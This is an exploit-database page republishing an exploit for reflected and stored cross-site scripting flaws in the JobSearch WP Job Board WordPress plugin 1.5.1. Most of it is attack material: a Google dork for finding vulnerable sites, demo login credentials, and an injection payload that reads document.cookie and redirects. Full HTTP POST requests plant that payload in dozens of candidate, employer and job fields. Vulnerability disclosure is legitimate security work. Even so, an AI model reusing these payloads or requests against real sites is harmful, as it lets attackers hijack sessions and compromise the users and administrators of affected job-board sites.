Advertisement






JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities

CVE Category Price Severity
CVE-2020-35648 CWE-79 $1500 Critical
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2020-07-18
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070097

Below is a copy:

JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities
[+] Exploit Title: JobSearch WP Job Board WordPress Plugin v1.5.1 - Multiple Vulnerabilities
[+] Google Dork: inurl:/wp-content/plugins/wp-jobsearch/
[+] Date: 2020-07-03
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Eyecix [ http://eyecix.com ]
[+] Software Version: 1.5.1
[+] Software Link: https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
[+] Tested on: Debian 10
[+] CVE: 
[+] CWE: CWE-79



### [ Info: ]

[i] An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the JobSearch plugin through 1.5.1 for WordPress.

[i] An Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself.

[i] Demo account #1 (Candidate): vladvector / DJKNFU#$&H#IUFD (login / password)

[i] Demo account #2 (Employer): vladvector2 / DJKNFU#$&H#IUFD (login / password)

[i] Candidate Profile URL: https://eyecix.com/plugins/jobsearch/candidate/vladvector/

[i] Employer Profile URL: https://eyecix.com/plugins/jobsearch/employer/vladvector/

[i] Employer Job URL: https://eyecix.com/plugins/jobsearch/job/poc/



### [ Vulnerabilities: ]

[x] Unauthenticated Reflected XSS -> /?location=[payload]

[x] Authenticated Persistent XSS -> Candidate Profile (vulnerable fields: Phone, Dial Code, Job Title, Academic Level, Age, Salary, Gender, Industry, Full Address)

[x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Phone, Dial Code, Founded Since, Member Title, Designation, Experience, Facebook URL, Google+ URL, Twitter URL, LinkedIn URL, Description, Full Address)

[x] Authenticated Persistent XSS -> Job Page (vulnerable fields: Offered Salary, Career Level, Experience, Gender, Industry, Qualifications, Job Description, Full Address)



### [ Payload: ]

[$] "--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->



### [ PoC Unauthenticated Reflected XSS: ]

[!] https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E

[!] GET /plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3Balert%28document.domain%29%3Bwindow.location%3D%60https%3A%2F%2Ftwitter.com%2Fvlad_vector%60%3B%20%22%3E HTTP/1.1
Host: eyecix.com



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765
Content-Length: 6644
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"



-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_phone"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="dial_code"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_sector"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_bio"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="academic-level"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="Age"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="salary"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="gender"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="industry"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------27142012921130118151484572765--



### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175
Content-Length: 6868
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_phone"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_website"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_sector"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_mm"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_yy"

1900
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_bio"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="founded-since"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------321608141216835281602774802175--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298
Content-Length: 5216
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/
Cookie: [cookies_here]

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_detail"

1337"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="application_deadline"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_sector"

12
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_type"

4
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="get_job_skills[]"

poc
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_url"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_email"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_max_salary"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="offered-salary"

31337"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="career-level"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="experience"

4-years"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="gender"

male"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="Industry"

graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="qualifications"

masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`VL?DV?CTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------35378657672420857749655614298--



### [ Contacts: ]

[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.